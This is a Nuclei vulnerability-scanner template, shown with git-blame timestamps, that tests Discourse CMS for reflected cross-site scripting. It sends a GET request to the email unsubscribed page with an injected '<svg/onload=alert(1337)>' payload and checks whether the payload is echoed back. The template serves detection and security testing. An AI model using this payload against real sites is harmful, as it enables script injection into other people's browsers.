nuclei-templates/vulnerabilities/discourse-xss.yaml

22 lines
474 B
YAML
Raw Normal View History

2020-09-01 02:25:25 +00:00
id: discourse-xss
2020-04-08 16:10:51 +00:00
info:
name: Discourse CMS - XSS
2020-04-08 16:10:51 +00:00
author: madrobot
2020-05-24 22:19:21 +00:00
severity: medium
description: Cross-site scripting (XSS) on Discourse CMS
2020-04-08 16:10:51 +00:00
requests:
- method: GET
path:
- '{{BaseURL}}/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(1337)%3E'
matchers-condition: and
2020-04-08 16:10:51 +00:00
matchers:
- type: status
status:
2020-05-24 22:19:21 +00:00
- 200
2020-04-08 16:10:51 +00:00
- type: word
words:
2020-05-24 22:19:21 +00:00
- "<svg/onload=alert(1337)>"
2020-04-08 16:10:51 +00:00
part: body